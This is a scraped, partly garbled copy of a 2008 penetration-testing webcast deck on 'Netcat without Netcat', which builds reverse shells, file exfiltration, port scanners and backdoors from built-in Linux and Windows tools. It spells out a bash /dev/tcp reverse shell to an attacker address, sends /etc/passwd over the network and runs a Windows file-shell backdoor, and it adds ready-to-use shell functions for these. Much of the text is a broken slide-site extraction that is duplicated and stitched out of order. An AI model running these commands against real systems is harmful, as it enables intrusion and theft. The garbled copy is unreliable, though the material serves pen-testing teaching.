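    '2008-08-14T10:00:15 host=WS01 pid=1205 image=cmd.exe cmdline=for /L %i in (1,1,10) do echo %i',
    '2008-08-14T10:00:18 host=WS01 pid=1206 image=ping.exe cmdline=ping -n 4 8.8.8.8',
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f"{alert['host']} pid {alert['pid']}: {', '.join(alert['tags'])}")
```

The share-redirection line alone only earns the weak UNC tag and does not alert, which is deliberate: copying output to a share is routine administration, so it is worth correlating with the other tags rather than alerting on by itself.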


The File Shell In Action

Outline
• Building a Penetration Test Infrastructure
• Netcat without Netcat
• Conclusions
• Q&A

Conclusions
• Netcat without Netcat shows that, with only individual command execution on a target machine, an attacker can use built-in tools to wield significant control over the target box
• Defenders need to be able to interpret attackers' actions and anticipate their moves
• Penetration testers need to be able to make the most of built-in tools to operate within the rules of engagement for their projects
• Netcat without Netcat serves these goals

Follow-Up
• SANS Security 560: Network Penetration Testing and Ethical Hacking
• 20% discount if you registered for this webcast
  – Use registration discount code of PENTEST20
• Discount applies to the 560 course through August:
  – June 4-9, Las Vegas, NV, Skoudis
  – June 12-July 22, Home, On-Line, Skoudis
  – July 24-29, Wash DC, Skoudis
  – Aug 11-16, Boston, Shackleford
  – Aug 18-23, Minneapolis, Conrad
  – Aug 24-29, Va Beach, Strand
• Go to www.sans.org and look for "560" for details

Outline
• Why Penetration Testing?
• Windows Command Line Tips for Pen Testers
• Conclusions
• Q&A
  – REMEMBER: The third webcast in this series of three will be on August 21, 2008


Windows Port Scanner Using

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26

Windows Port Scanner Using

Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i

bull Problem When it finds an open port it hangsbull How to address

ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume

ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where

name=telnetexe delete amp ping -n 6 127001

ndash Downside Race condition may kill one that hasnrsquot finished checking

M P bl ith Wi d

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27

More Problems with Windows

Telnet Client as a Port Scannerbull Other problems

ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client

ndash Attempts at redirection either make it hang or not run

bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option

bull So you have to watch it sadly

ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land

bull There must be a better way

Wi d P t S U i

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28

Windows Port Scanner Using

FTP Clientbull Windows FTP client Cgt ftp [IPaddr]

bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21

bull Solution But you can specify dest port in an FTP

command file ndash open [IPaddr] [port]

bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]

bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file

displaying or storing results at each iteration

Th Wi d C d Li

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29

The Windows Command Line

Port Scanner Using FTP Clientbull Cgt for L i in (111024) do

echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt

bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad

bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly

Making It Store Results

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30

Making It Store Resultsbull Cgt for L i in

(111024) do

echo Checking

Port i gtgt

portstxt amp echoopen [IP_addr] i

gt ftptxt amp echo

quit gtgt ftptxt ampftp -sftptxt

2gtgtportstxt

Windows Command Line File Transfer

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31

Windows Command-Line File Transfer

bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on

the command line redirecting to shares

bull Cgt type [filename] gt[machine][share][filename]

bull Will use current user credentialshellip

bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]

bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands

across the network not just files

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32

File Transfer in Action

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33

Backdoors The File Shellbull Now letrsquos do a backdoor

bull Listening on a port is hardhellipbull But we can look in the file system

bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file

bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34

Using the File Shell

bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt

bull And we can read results by using type to read[IP_addr][share]outputtxt

bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea

ndash Use FTP client to move commands on arbitrary portswriting them into the file system

ndash Or rely on nslookup to pull domain names that includecommands

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35

The File Shell In Action

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36

Outline

bull Building a Penetration TestInfrastructure

bull Netcat without Netcatbull Conclusions

bull QampA

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37

Conclusionsbull Netcat without Netcat shows that with only individual

command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box

bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves

bull Penetration testers need to be able to make the most

of built-in tools to operate within the rules of engagement for their projects

bull Netcat without Netcat serves these goals

Follo Up

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38

Follow-Upbull SANS Security 560 Network Penetration Testing

and Ethical Hacking

bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20

bull Discount applies to 560 course through August

ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis

ndash July 24-29 Wash DC Skoudis

ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad

ndash Aug 24-29 Va Beach Strand

bull Go to wwwsansorg and look for ldquo560rdquo for details

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39

Outlinebull Why Penetration Testing

bull Windows Command Line Tips for PenTesters

bull Conclusions

bull QampA

ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008

Page 8: Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 839Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 8

Testing Network

Infrastructure - ISPbull For internal testing a fast connection near a backbone with

minimal filtering is idealbull For Internet-based testing you will need to send packets

through your ISP to the target

ndash Scanning ndash large number of sometimes unusual packets ndash Exploitation

bull Some ISPs detect scanning or exploits and then block them ndash Some do this with network-based Intrusion Prevention Systems

bull Can seriously impair your ability to test and the accuracy of your results

bull Tell your ISP that you plan to do pen tests and ask if theyblock

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 939Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 9

Outline

bull Building a Penetration TestInfrastructure

bull Netcat without Netcatbull Conclusions

bull QampA

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1039

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 10

What is Netcat

bull Netcat General-purpose TCP and UDP network widget running on LinuxUnix and Windows

bull Takes Standard In and sends it across the network

bull Receives data from the network and puts it onStandard Out

bull Messages from Netcat itself put on Standard Error

NetcatStd Out Receive packets

Std In Send packets

Std Err

The

System

The

Network

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1139

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 11

What Can Netcat Do for Usbull Send files

bull Port scan

bull Backdoor shell access

bull Connecting to arbitrary open portsbull Vulnerability scanning

bull Simple chats

bull Replay data in TCP or UDP packets

bull Relays bouncing between systems

bull Much much morehellip

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1239

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 12

What Is Netcat Without

Netcatbull Netcat without Netcat involves constructing commands

that achieve Netcat behaviorhellip ndash hellipwithout the use of Netcat

bull Wersquoll rely on built-in tools only

bull Remember those old ATampT commercials ndash Have you ever kissed your baby goodnighthellip from a payphone

ndash Have you ever made a command shell backdoor using Linuxrsquos devtcp

ndash Have you ever shoveled shell using Linux telnet clients ndash Have you ever made a port scanner using a Windows FTP client

ndash Have you ever made the Windows file system behave like acommand shell

bull YOU WILL

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1339

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 13

Why Netcat without Netcatbull For penetration testers

ndash Netcat functionality is very useful in making one systemattack another machine

ndash But the projectrsquos rules of engagement may prohibitinstallation of additional software such as Netcat on

compromised targets ndash Some anti-virus tools detect and block Netcat

ndash Live off the land Be a command-line MacGyver

ndash Where wersquore going we donrsquot need Netcat

Attacker

ConqueredTarget

Next Target

S h e l l

a c c ess

sca na na ly z eex p lo it

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1439

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 14

Useful Netcat Functionsbull As wersquove seen Netcat can be used in countless

different waysbull Letrsquos pick some of the most useful and see how we

can make built-in tools do each function on Linux and

Windows ndash Backdoor shell

ndash File transfer

ndash Port scanner

bull Wersquoll vary the order in which we do each action aswersquoll build from fundamental principles to morecomplex techniques

ndash And the order of those principles differs between Linux andWindows

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1539

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 15

Linux
• /dev/tcp rocks
• On most Linux variants (except Debian-derived systems like Ubuntu, whose bash was built without this feature at the time of this 2008 webcast), the default built-in bash can redirect to and from /dev/tcp/[IPaddr]/[port]
– Opens a TCP connection with the target IPaddr on that port
– This is a bash feature, not a device in the file system: there is no /dev/tcp entry, and /bin/sh (dash) does not understand it. Net redirections are a bash compile-time option, and current Debian and Ubuntu builds have it enabled
• With a little command-line magic, we can use this for Netcat-like behavior


Linux Command-Line File Transfer
• To send a file, we can just redirect its contents into /dev/tcp/[IPaddr]/[port], as in:
• $ cat /etc/passwd > /dev/tcp/[IPaddr]/[port]
• Catch it on the other side with a Netcat listener


Linux Command-Line Backdoor via /dev/tcp
• We can connect Standard In, Standard Out and Standard Error of a bash shell to /dev/tcp to implement a reverse shell backdoor:
/bin/bash -i > /dev/tcp/[Attacker_IPaddr]/[port] 0<&1 2>&1
• Shovels a shell from the victim Linux machine to the attacker's waiting Netcat listener, where commands can be entered
– The order of the redirections matters: > opens the connection and places the socket on Standard Out first, then 0<&1 and 2>&1 copy that same socket onto Standard In and Standard Error. Putting 0<&1 before the > would duplicate the terminal's stdin instead, and the listener could never send commands
[Diagram: the victim runs "/bin/bash -i > /dev/tcp/[Attacker_IPaddr]/[port] 0<&1 2>&1" on the Protected Server, behind a firewall that blocks incoming connections; the attacker runs "nc -l -p [p]" and types commands there, which are executed on the server]
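Both ends of the /dev/tcp file transfer and the /dev/tcp reverse shell from the two slides above, written as shell functions. This is an added example, not code from the deck. It assumes, as the deck does, that the attacker's machine has Netcat, and it adds two things the one-liners leave out: the sender returns non-zero when nothing is listening (bash fails the redirection), and both ends print a SHA-256 digest because the raw TCP stream carries no length or checksum.

```shell
#!/bin/sh
# Added example: both ends of the /dev/tcp file transfer and reverse shell.
# The /dev/tcp pieces run inside an explicit "bash -c" because /dev/tcp is a
# bash feature, not a file, and this script may be started by /bin/sh.

# --- attacker side ----------------------------------------------------------
# catch_file PORT OUTFILE : listen once, save whatever arrives, print its digest.
# Traditional Netcat syntax as in the deck; OpenBSD netcat wants "nc -l PORT".
# nc exits when the sender closes the connection, i.e. when cat has finished.
catch_file() {
  port=$1; out=$2
  nc -l -p "$port" > "$out" || return 1
  sha256sum "$out" | cut -d' ' -f1
}

# listen_shell PORT : wait for the reverse shell; commands typed here run on the target.
listen_shell() {
  nc -l -p "$1"
}

# --- target side ------------------------------------------------------------
# send_file HOST PORT FILE : bash opens the connection while setting up the
# redirection. If nothing is listening it prints "Connection refused" (silenced
# here) and the redirection fails, so the caller sees a non-zero status instead
# of a transfer that silently went nowhere.
send_file() {
  host=$1; port=$2; file=$3
  bash -c 'cat -- "$2" > "/dev/tcp/$0/$1"' "$host" "$port" "$file" 2>/dev/null || return 1
  sha256sum "$file" | cut -d' ' -f1   # compare with what catch_file printed
}

# reverse_shell HOST PORT : the deck's one-liner. ">" connects and puts the
# socket on fd 1 first; 0<&1 and 2>&1 then copy that socket onto stdin and
# stderr. Written as "0<&1 > /dev/tcp/..." the shell would keep the terminal's
# stdin and the listener could never send commands.
reverse_shell() {
  bash -c 'exec bash -i > "/dev/tcp/$0/$1" 0<&1 2>&1' "$1" "$2" 2>/dev/null
}
```

On the attacker's box run `catch_file 4444 passwd.copy` (or `listen_shell 4444`) before the target-side command is issued; a digest mismatch means the stream was cut short, which nothing in the protocol would otherwise reveal.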


Linux Command-Line Reverse Shell Backdoor In Action
[Screenshot not reproduced in this transcript]


Linux Command-Line Port Scanner
• To see if a single port is open, we could run:
$ echo > /dev/tcp/[IPaddr]/[port]
• Note that the "Connection refused" text is not written by echo: bash itself prints it while setting up the redirection, before the command ever runs
– So a 2> placed after the failed redirection on the same command never takes effect. To capture or silence the message, redirect the Standard Error of an enclosing brace group or subshell instead
[Screenshot: the probe against a listening port; caption "Port 80 is listening"]


Storing Results and Iterating
• But it does set the exit status variable "$?" to 0 if the port is open, 1 if it is closed
• For a port scanner, we could use a while loop that increments through port numbers:
$ port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port is open >> /tmp/ports.txt; port=`expr $port + 1`; done
• We append results in the loop (>> /tmp/ports.txt) so that they can be tailed while the scan is running
– I want this to be as operationally clean as possible for pen testers
– Two things to keep in mind: -lt 1024 stops at port 1023, and a filtered port (one that answers with neither SYN/ACK nor RST) makes the redirection block until the kernel's TCP connect timeout expires, which on Linux is well over a minute per port
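The loop above stalls on a filtered port and cannot tell closed from filtered. The version below is an added example, not the deck's code: it wraps each probe in timeout(1), classifies the result from the exit status (timeout reports 124 when it had to kill the probe), silences bash's own "Connection refused" message by redirecting the wrapper's Standard Error, and adds a banner grab for the ports it finds open. The probes run inside an explicit bash -c because /dev/tcp is a bash feature and the outer script may be started by /bin/sh.

```shell
#!/bin/sh
# Added example: /dev/tcp port scanner hardened with a per-port timeout.

# probe_tcp HOST PORT [SECONDS] -> prints open, closed or filtered
probe_tcp() {
  host=$1; port=$2; wait=${3:-3}
  # "exec 3<>" opens the connection read/write on fd 3; the throw-away bash then
  # exits, which closes it. Status 0: connected. 124: timeout(1) expired, i.e. no
  # answer at all (filtered). Anything else: the connect failed (RST: closed).
  if timeout "$wait" bash -c 'exec 3<>"/dev/tcp/$0/$1"' "$host" "$port" 2>/dev/null; then
    echo open
  elif [ $? -eq 124 ]; then
    echo filtered
  else
    echo closed
  fi
}

# grab_banner HOST PORT [SECONDS] -> first line the service volunteers (SSH, SMTP,
# FTP and friends talk first); prints nothing for silent services or closed ports.
grab_banner() {
  timeout "$(( ${3:-3} + 1 ))" bash -c '
    exec 3<>"/dev/tcp/$0/$1" || exit 1
    IFS= read -r -t "$2" line <&3 && printf "%s\n" "$line"
    exec 3<&-' "$1" "$2" "${3:-3}" 2>/dev/null
}

# scan_tcp HOST FIRST LAST [OUTFILE] -> appends "PORT STATE [banner]" for every
# port that is not closed, so the file can be tailed while the scan runs.
scan_tcp() {
  host=$1; port=$2; last=$3; out=${4:-/tmp/ports.txt}
  while [ "$port" -le "$last" ]; do
    state=$(probe_tcp "$host" "$port")
    if [ "$state" = open ]; then
      printf '%s open %s\n' "$port" "$(grab_banner "$host" "$port" 2)" >> "$out"
    elif [ "$state" = filtered ]; then
      printf '%s filtered\n' "$port" >> "$out"
    fi
    port=$((port + 1))
  done
}
```

`scan_tcp 10.1.1.5 1 1024` then `tail -f /tmp/ports.txt` gives the deck's workflow without the hang; a run consisting mostly of "filtered" lines, each taking the full timeout, is itself a finding (a host firewall that drops rather than rejects).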


Command-Line Port Scanner In Action
[Screenshot not reproduced in this transcript; the annotation in the image reads "5 Not Closed"]


Linux Command-Line Backdoor via "Reverse Telnet"
• There's a whole different way we can get remote shell without using /dev/tcp
• Linux telnet clients let us redirect Standard In and Standard Out
• Gives rise to "Reverse telnet"
• On target machine, we could run:
$ telnet [attacker_IPaddr] [port1] | /bin/bash | telnet [attacker_IPaddr] [port2]
• Provide commands on attacker's machine via port1
• Receive output on attacker's machine on port2
– The attacker needs one listener per port (for example, two Netcat listeners), both started before the target-side command is run


Reverse Telnet Shell in Action
[Screenshot not reproduced in this transcript]


Windows
• Built-in command line has very clunky syntax
• Also, telnet and ftp clients are absolutely atrocious
– Especially in the way that they (don't) interact with Standard In and Standard Out
• Thus, we will build Netcat-without-Netcat from some fundamental command-line building blocks in Windows


Building Blocks: Windows FOR Loops
• Iteration can be very helpful
– We're not expecting you to be programmers
– But sometimes you'll want to iterate over a given set of items:
• Numbers
• Lines in a file
• The Windows command line supports several kinds of FOR loops... some of the most useful are:
– FOR /L: Counter
– FOR /F: Iterate over file contents, strings or command output
• See the first webcast in this series for details on how these work... we won't go through them again here


Windows Port Scanner Using Telnet Client
• We could systematically telnet to port after port:
– C:\> for /L %i in (1,1,1024) do telnet [IPaddr] %i
• Problem: When it finds an open port, it hangs
• How to address?
– Watch it... When it stops, hit CTRL-] (the telnet client's escape character) and then type quit to resume
– Or kill the telnet client every 5 seconds, from a second command prompt:
• C:\> for /L %i in (1,0,2) do wmic process where name="telnet.exe" delete & ping -n 6 127.0.0.1
• (A step of 0 makes this FOR /L loop forever; ping -n 6 against 127.0.0.1 is just a sleep of about 5 seconds)
– Downside: Race condition may kill one that hasn't finished checking


More Problems with Windows Telnet Client as a Port Scanner
• Other problems:
– Results aren't logged
• You can't do anything with Standard Out of the telnet client
– Attempts at redirection either make it hang or not run
• And the logging option of the Windows telnet client (-f [filename]) overwrites all earlier logs... No append option
• So you have to watch it, sadly
– Most versions of Vista do not include the telnet client by default
• But Netcat without Netcat is about living off the land
• There must be a better way!


Windows Port Scanner Using FTP Client
• Windows FTP client: C:\> ftp [IPaddr]
• Problem: Can't specify the port to connect to on the invocation command line... only connects to TCP port 21
• Solution: But you can specify the destination port in an FTP command file:
– open [IPaddr] [port]
• Then the ftp client can read the contents of that file and do what it says, by being invoked with:
– C:\> ftp -s:[filename]
• We'll write a loop that generates an FTP command file and invokes FTP to run commands from that file, displaying or storing results at each iteration


The Windows Command Line Port Scanner Using FTP Client
• C:\> for /L %i in (1,1,1024) do echo open [IPaddr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt
• Problem: It hangs for about 30 seconds on an open port, then moves on
– That's not so bad
• Another Problem: It doesn't store results
– We can fix that, but it gets a little ugly


Making It Store Results
• C:\> for /L %i in (1,1,1024) do echo Checking Port %i >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt
• Each pass writes a "Checking Port" marker, and the 2>>ports.txt redirection adds the ftp client's connection error under the marker of every port that refused; a marker with no error after it is an open port
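What the loop above leaves in ports.txt is one "Checking Port N" marker per port, followed by an error line only when the connect failed. The parser below is an added example, not from the deck, for turning that file into a list of open ports once it has been copied back to the tester's machine: a marker with no error text before the next marker is an open port. The sample log is constructed, not captured from a real host, and the exact wording of the ftp client's error lines is an assumption; the rule matches "refused", "timed out" and "unreachable", and any port followed by such a line is left out.

```shell
#!/bin/sh
# Added example: reduce the ports.txt written by the FTP-client scan loop to
# the ports that accepted a connection.

# Constructed sample (not captured from a real host) of the file the loop
# produces: a marker per port, an error line only after the ports that failed.
SAMPLE_PORTS_TXT='Checking Port 21
> ftp: connect :Connection refused
Checking Port 22
Checking Port 23
> ftp: connect :Connection refused
Checking Port 80
Checking Port 81
> ftp: connect :Connection timed out'

# open_ports_from_log FILE -> space-separated list of ports whose marker is not
# followed by a connect error before the next marker (or end of file).
open_ports_from_log() {
  awk '
    { sub(/\r$/, "") }                                      # tolerate Windows line endings
    /^Checking Port [0-9]+/ { flush(); port = $3; next }    # new marker: settle the previous port
    port != "" && /refused|timed out|unreachable/ { port = "" }   # error text: not open
    END { flush(); print out }
    function flush() { if (port != "") out = (out == "" ? port : out " " port); port = "" }
  ' "$1"
}
```

Usage: `printf '%s\n' "$SAMPLE_PORTS_TXT" > ports.txt; open_ports_from_log ports.txt` prints `22 80`. A port that timed out rather than refused is worth a second look by hand, since the loop cannot distinguish a dropped SYN from a slow service.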


Windows Command-Line File Transfer
• File transfer on arbitrary ports is hard
• But we can use Windows file and print sharing on the command line, redirecting to shares:
• C:\> type [filename] > \\[machine]\[share]\[filename]
• Will use current user credentials...
• Or if you want different credentials, first do a:
– C:\> net use \\[machine] [password] /u:[user]
• Can't we just use copy or move? Yes, but relying on redirection (>) of Standard Out is nice here
– Because we can redirect the output of commands across the network, not just files


File Transfer in Action
[Screenshot not reproduced in this transcript]


Backdoors: The File Shell
• Now, let's do a backdoor
• Listening on a port is hard...
• But we can look in the file system
• A FOR loop can spin, looking for a command in a file, run the command, and dump output to another file:
• C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1
– The outer FOR /L (step 0) never ends; the inner FOR /F reads commands.txt one line at a time, and "delims=^" keeps each whole line in %j instead of splitting it on spaces; ping -n 2 127.0.0.1 is a one-second sleep between polls


Using the File Shell
• Now we can feed it commands by echoing them into \\[IP_addr]\[share]\commands.txt
• And we can read results by using type to read \\[IP_addr]\[share]\output.txt
• The file shell is a building block...
– Other folks are starting to use it, extending the idea
– Use FTP client to move commands on arbitrary ports, writing them into the file system
– Or rely on nslookup to pull domain names that include commands
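Driving the file shell from the attacker's side, as an added example that is not part of the deck. It assumes the target's share is reachable as a local directory (SHAREDIR, for instance a CIFS mount of \\[IP_addr]\[share]) and handles two things the echo/type pair above does not: the command file is written under a temporary name and renamed, so the target's FOR /F never reads a half-written commands.txt, and the client waits for the loop to delete commands.txt before reading output.txt, because the loop appends the output before it deletes the command file. The one-second polling interval matches the loop's ping -n 2 delay; a command that is never consumed returns status 1 after the timeout.

```shell
#!/bin/sh
# Added example: attacker-side client for the cmd.exe file shell.

# fileshell_run SHAREDIR COMMAND [TIMEOUT_SECONDS]
# Drops one command where the target's loop will find it, waits for the loop to
# consume (delete) commands.txt, then prints only the bytes output.txt gained.
fileshell_run() {
  share=$1; cmd=$2; limit=${3:-30}
  out="$share/output.txt"
  before=0
  [ -f "$out" ] && before=$(wc -c < "$out")
  # Write to a temporary name and rename: the target's FOR /F must never see a
  # half-written commands.txt. A bare LF line ending is fine for FOR /F.
  printf '%s\n' "$cmd" > "$share/commands.tmp" || return 2
  mv "$share/commands.tmp" "$share/commands.txt" || return 2
  waited=0
  while [ -e "$share/commands.txt" ]; do        # the loop deletes it once executed
    sleep 1
    waited=$((waited + 1))
    if [ "$waited" -ge "$limit" ]; then
      return 1                                   # loop not running, or stuck on a command
    fi
  done
  # The loop runs "cmd.exe /c %j >> output.txt" before "del commands.txt", so
  # once the command file is gone everything past $before is this command's output.
  [ -f "$out" ] && tail -c +"$((before + 1))" "$out"
  return 0
}
```

Usage: `fileshell_run /mnt/target ipconfig` prints the new output and returns 0. An empty result with status 0 means the loop's del ran between the rename and its next FOR /F pass (the same race the deck notes for the telnet killer); just send the command again.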


The File Shell In Action
[Screenshot not reproduced in this transcript]


Outline
• Building a Penetration Test Infrastructure
• Netcat without Netcat
• Conclusions
• Q&A


Conclusions
• Netcat without Netcat shows that, with only individual command execution on a target machine, an attacker can use built-in tools to wield significant control over the target box
• Defenders need to be able to interpret attackers' actions and anticipate their moves
• Penetration testers need to be able to make the most of built-in tools to operate within the rules of engagement for their projects
• Netcat without Netcat serves these goals


Follow-Up
• SANS Security 560: Network Penetration Testing and Ethical Hacking
• 20% discount if you registered for this webcast
– Use registration discount code of PENTEST20
• Discount applies to 560 course through August:
– June 4-9, Las Vegas, NV, Skoudis
– June 12-July 22, Home On-Line, Skoudis
– July 24-29, Wash DC, Skoudis
– Aug 11-16, Boston, Shackleford
– Aug 18-23, Minneapolis, Conrad
– Aug 24-29, Va Beach, Strand
• Go to www.sans.org and look for "560" for details


Outline
• Why Penetration Testing?
• Windows Command Line Tips for Pen Testers
• Conclusions
• Q&A
– REMEMBER: The third webcast in this series of three will be on August 21, 2008

Page 9: Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 939Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 9

Outline

bull Building a Penetration TestInfrastructure

bull Netcat without Netcatbull Conclusions

bull QampA

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1039

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 10

What is Netcat

bull Netcat General-purpose TCP and UDP network widget running on LinuxUnix and Windows

bull Takes Standard In and sends it across the network

bull Receives data from the network and puts it onStandard Out

bull Messages from Netcat itself put on Standard Error

NetcatStd Out Receive packets

Std In Send packets

Std Err

The

System

The

Network

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1139

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 11

What Can Netcat Do for Usbull Send files

bull Port scan

bull Backdoor shell access

bull Connecting to arbitrary open portsbull Vulnerability scanning

bull Simple chats

bull Replay data in TCP or UDP packets

bull Relays bouncing between systems

bull Much much morehellip

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1239

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 12

What Is Netcat Without

Netcatbull Netcat without Netcat involves constructing commands

that achieve Netcat behaviorhellip ndash hellipwithout the use of Netcat

